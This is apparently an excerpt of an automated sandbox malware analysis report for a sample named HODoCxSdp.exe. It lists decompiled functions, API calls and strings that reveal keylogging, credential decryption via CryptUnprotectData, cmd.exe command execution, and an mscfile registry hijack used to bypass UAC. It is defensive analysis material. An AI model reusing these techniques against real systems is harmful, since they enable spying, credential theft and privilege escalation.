Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 0044DBC6
_free.LIBCMT ref: 0044DBD8
_free.LIBCMT ref: 0044DBEA
_free.LIBCMT ref: 0044DBFC

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction ID: 294e589d6328203d0d12509a579114aacc3179ef351d8ef0a61016021d4f39e6
Opcode Fuzzy Hash: 4ff6445dbd1c139c6c118283ff3a35b6f69cd7d79671e775af14f987f4430014
Instruction Fuzzy Hash: DDF04F339002146BA620EF6AE9C6C5773D9EE01B15355880AF085E7600EA78FC80965C

Function 00441548 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441566

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

_free.LIBCMT ref: 00441578
_free.LIBCMT ref: 0044158B
_free.LIBCMT ref: 0044159C
_free.LIBCMT ref: 004415AD

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction ID: 534a9c52bd02544fd4565401bb604a6095318b382a753ef56e7f6fd0a1c42297
Opcode Fuzzy Hash: dc25ad9d7c881d5a7498954b547f4469e613371529959f9048218c6a37a16c45
Instruction Fuzzy Hash: 00F030B78052209BD7016F55BC864053BA0BB04B29305853BF8ADE6670FBB90A458F8E

Function 00447DD2 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

e]j[/, xrefs: 00447DDA

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID:
String ID: e]j[/
API String ID: 0-424226671
Opcode ID: 9ff85bb65c223495028394ed627a76c0a22abab92a1fd8e49ea12ee9b4a17c6f
Instruction ID: a029da65896a7fe8acf4e5034f1fb5ac1edcf33333bc64468ca521ac0de82b0c
Opcode Fuzzy Hash: 9ff85bb65c223495028394ed627a76c0a22abab92a1fd8e49ea12ee9b4a17c6f
Instruction Fuzzy Hash: 5D51D47190820AAFEB11EFA5C845EAF7FB5AF09314F24015BF404A7291D7789D07CB6A

Function 00412446 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 004124AD
RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 004124DC
RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 0041257C

Strings

[regsplt], xrefs: 00412608

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Enum$InfoQueryValue
String ID: [regsplt]
API String ID: 3554306468-4262303796
Opcode ID: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
Instruction ID: d2130986b24ed572c5287744f6969716810a156cba9fb87d3bcc7fef363a21f2
Opcode Fuzzy Hash: 5841badb2ff9825d46e36e26999fd6152bd29a2a307a84bebb93b53298b167be
Instruction Fuzzy Hash: A6513C71900219AADB10EBA1DD81EEFB7BDEF04304F10016AF505F2191EF786B49CBA8

Function 00450054 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 150COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00450169

Part of subcall function 0044FF59: __alloca_probe_16.LIBCMT ref: 0044FFC2
Part of subcall function 0044FF59: WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 0045001F
Part of subcall function 0044FF59: __freea.LIBCMT ref: 00450028

_free.LIBCMT ref: 004500BF

Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA

GetLastError.KERNEL32(?,?,?,?,00000000), ref: 004500FA

Part of subcall function 00443005: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,004457DA,00000001,00000364,?,00000000,?,00439A11,00000000,?,?,00439A95,00000000), ref: 00443046

Strings

e]j[/, xrefs: 0045005F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast_free$AllocateByteCharFreeMultiWide__alloca_probe_16__freea
String ID: e]j[/
API String ID: 2017883074-424226671
Opcode ID: 200cba478437a5113e7f3f71601981e079a050df7e877e722961cf1084b29fba
Instruction ID: bc798e9b4830b893168dd880b3a77abb3d1326a2d136a6bddd6d42b609253282
Opcode Fuzzy Hash: 200cba478437a5113e7f3f71601981e079a050df7e877e722961cf1084b29fba
Instruction Fuzzy Hash: 2241A275900515ABEF219F269C41F9F7AB8AF05711F10409AFC08E6242EE3ACE549B6A

Function 0040184A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 142threadCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0040189E
ExitThread.KERNEL32 ref: 004018D6
waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00471E78,00000000), ref: 004019E4

Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B

Strings

8:G, xrefs: 00401868

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
String ID: 8:G
API String ID: 1649129571-405301104
Opcode ID: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
Instruction ID: 6b8457e9d7ea4966c0dd8dde8758560e0d74fde28bba72e74fe0511dc6260a90
Opcode Fuzzy Hash: d11932d744bb97d4d23e75232cb79a590d4ec77f01a60ef524a2726dec1169f8
Instruction Fuzzy Hash: 7941E7325042005BC324FB65DD86EAFB3A9AB84318F40453FF589621F2DF78994ADB5E

Function 00440935 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\HODoCxSdp.exe,00000104), ref: 00440975
_free.LIBCMT ref: 00440A40
_free.LIBCMT ref: 00440A4A

Strings

C:\Users\user\AppData\Roaming\HODoCxSdp.exe, xrefs: 0044096C, 00440973, 004409A2, 004409DA

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\AppData\Roaming\HODoCxSdp.exe
API String ID: 2506810119-534934771
Opcode ID: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction ID: d1e15b597fe779666310b40bee8bd10d15f5dfa451d6ac01ff045fbeec250af7
Opcode Fuzzy Hash: 85438adf96173c680659750e247b8861d1a9ea07739a925f85de7b4b5d9254a8
Instruction Fuzzy Hash: CA31C4B1A00318AFEB21DF99D88199EBBF8EF84314F10406BF544A7311E6B48E55CB59

Function 00447BBA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000,00000000,00000000,?,?,00447F19,00453EB5,00000000,00000000), ref: 00447C6D
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,00447F19,00453EB5,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447C9B
GetLastError.KERNEL32(?,00447F19,00453EB5,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00447CCC

Strings

e]j[/, xrefs: 00447BC9

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharErrorFileLastMultiWideWrite
String ID: e]j[/
API String ID: 2456169464-424226671
Opcode ID: 73b95891e8dcdf2f17b186e6bc17e7350a473f9c291a9ecfde05927b3d2433e2
Instruction ID: 1e79d5f355ed7a91c9b04205d0e50e763cc12329cbdf821adc5ff38ebb03a107
Opcode Fuzzy Hash: 73b95891e8dcdf2f17b186e6bc17e7350a473f9c291a9ecfde05927b3d2433e2
Instruction Fuzzy Hash: 87317E75A002199FDB24DF69DDC19EAB7B8EB18305F0044BEE90AD7250D734AD85CB64

Function 0044FF59 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0044FFC2
WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,?,00001004,00000000,00000000,?,00000080,00000000,00000000,?,00000080,00000000,00000000), ref: 0045001F
__freea.LIBCMT ref: 00450028

Strings

e]j[/, xrefs: 0044FF61

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__alloca_probe_16__freea
String ID: e]j[/
API String ID: 3062693170-424226671
Opcode ID: 8026fe1e3f9158d1f2c54c9eaeec3a2f508fb10abf021a5701c6e46820988bfe
Instruction ID: 47bb55cdbd01293dcf51f7497955c3c62298e0bed5545dc15d584b39b8ef2ae1
Opcode Fuzzy Hash: 8026fe1e3f9158d1f2c54c9eaeec3a2f508fb10abf021a5701c6e46820988bfe
Instruction Fuzzy Hash: DE310432A00156ABDB209F66DC45DAFBBA4EF41714F14426AFC14DB291DB38DD48C794

Function 00419675 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

Part of subcall function 00412006: RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
Part of subcall function 00412006: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
Part of subcall function 00412006: RegCloseKey.ADVAPI32(00000000), ref: 00412054

Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34

_wcslen.LIBCMT ref: 00419744

Strings

program files (x86)\, xrefs: 0041973E
.exe, xrefs: 00419696
program files\, xrefs: 0041972A, 00419731, 00419743

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseCurrentOpenProcessQueryValue_wcslen
String ID: .exe$program files (x86)\$program files\
API String ID: 37874593-1203593143
Opcode ID: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
Opcode Fuzzy Hash: 546b0d98d04e059566fa11c86a24e7130a7516f31b9ccb35c8e0da8d0391a80d
Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9

Function 00409203 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,00409305,00472008,00000000,00000000), ref: 0040928B
CreateThread.KERNEL32(00000000,00000000,004092EF,00472008,00000000,00000000), ref: 0040929B
CreateThread.KERNEL32(00000000,00000000,00409311,00472008,00000000,00000000), ref: 004092A7

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Strings

Offline Keylogger Started, xrefs: 00409228, 0040922F, 0040925C

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTimewsprintf
String ID: Offline Keylogger Started
API String ID: 465354869-4114347211
Opcode ID: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
Instruction ID: c8e77f7b3f84bd49b91c3d3ae4e8ac846fef78eef7351f53fb2416b9cb49ddb0
Opcode Fuzzy Hash: fcb156bf474100ecd8714675bcdacda6a6d505e445d23128ee173ce543fa6834
Instruction Fuzzy Hash: 3211A7A15003083ED210BB669DD6CBB7A5CDA8139CB40057FF845221C3EAB85D19C6FF

Function 00409E37 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00472008), ref: 0040A0BE
Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F

Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4

CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 00409EB7
CreateThread.KERNEL32(00000000,00000000,00409311,?,00000000,00000000), ref: 00409EC3
CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF

Strings

Online Keylogger Started, xrefs: 00409E4C, 00409E55, 00409E7F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CreateThread$LocalTime$wsprintf
String ID: Online Keylogger Started
API String ID: 112202259-1258561607
Opcode ID: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
Opcode Fuzzy Hash: 3095bb4c8629fd0e670b035ea9b5ccaf12231fc020c32c5bedba700ceaefce21
Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE

Function 00432D4B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
___raise_securityfailure.LIBCMT ref: 00432E76

Strings

e]j[/, xrefs: 00432E57
(F, xrefs: 00432E71

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: (F$e]j[/
API String ID: 3761405300-798137001
Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F

Function 00404F31 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00404F61
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
CreateThread.KERNEL32(00000000,00000000,00405130,?,00000000,00000000), ref: 00404FC0

Strings

Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Create$EventLocalThreadTime
String ID: Connection KeepAlive | Enabled | Timeout:
API String ID: 2532271599-507513762
Opcode ID: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
Opcode Fuzzy Hash: ecde6dd8490a4419ba9d8f450afdef6f270760df43025f419a01a865904151c8
Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA

Function 00406071 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
GetProcAddress.KERNEL32(00000000), ref: 00406097

Strings

crypt32, xrefs: 0040608B
CryptUnprotectData, xrefs: 00406086

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32
API String ID: 2574300362-2380590389
Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794

Function 0040513C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
CloseHandle.KERNEL32(?), ref: 004051AA
SetEvent.KERNEL32(?), ref: 004051B9

Strings

Connection Timeout, xrefs: 00405178

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseEventHandleObjectSingleWait
String ID: Connection Timeout
API String ID: 2055531096-499159329
Opcode ID: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
Opcode Fuzzy Hash: 69bf4708d5eac36444cb13c7d4d8205934b4ecb8f60f6f16827c1b7745a6238b
Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49

Function 0040D1F0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E

Strings

ios_base::badbit set, xrefs: 0040D21A
ios_base::failbit set, xrefs: 0040D240
ios_base::eofbit set, xrefs: 0040D24D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
Opcode Fuzzy Hash: 07dcd5cdd291a6416836d0c86817599069bcc3367b78dc6d1ec70403740c8f80
Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F

Function 004120E8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
RegCloseKey.ADVAPI32(00000000), ref: 00412128

Strings

origmsc, xrefs: 004120F4

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: origmsc
API String ID: 3677997916-68016026
Opcode ID: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
Instruction ID: 61f3e32b1c93232b19bf4a4cc48abe95026028d342b1827e6ec6edb2467bbf34
Opcode Fuzzy Hash: d40fef656c83bcaf339f4d5c80b35c3f5e3dd6ef5f24df27a21155112b999244
Instruction Fuzzy Hash: 4C014B31800229BBCF219F91DC49DEB7F29EF05761F0141A5BE08A2161D63589BADBA4

Function 00414839 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B

Strings

cmd.exe, xrefs: 00414870
open, xrefs: 00414875
/C , xrefs: 00414859

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: /C $cmd.exe$open
API String ID: 587946157-3896048727
Opcode ID: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
Opcode Fuzzy Hash: e8ae4e63c9dc0d6232b12cfcea10d76e3d0f37ee2c59ec5f687c9fc8ea61ff61
Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A

Function 00412006 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
RegCloseKey.ADVAPI32(00000000), ref: 00412054

Strings

http\shell\open\command, xrefs: 00412026

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5

Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046FB08), ref: 0041220F
RegSetValueExW.ADVAPI32(0046FB08,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,0046FB08), ref: 0041223E
RegCloseKey.ADVAPI32(0046FB08,?,80000001,?,0040674F,00469654,0046FB08), ref: 00412249

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 0041220D

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Classes\mscfile\shell\open\command
API String ID: 1818849710-505396733
Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94

Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18

Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430

__CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E

Strings

bad locale name, xrefs: 0040CA28

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
String ID: bad locale name
API String ID: 3628047217-1405518554
Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699

Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C

Strings

P0F, xrefs: 0041226C, 0041228E, 0041226F

Memory Dump Source

Source File: 00000011.00000002.1757670038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_HODoCxSdp.jbxd

Yara matches

Similarity

API ID: CloseCreateValue
String ID: P0F
API String ID: 1818849710-3540264436
Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
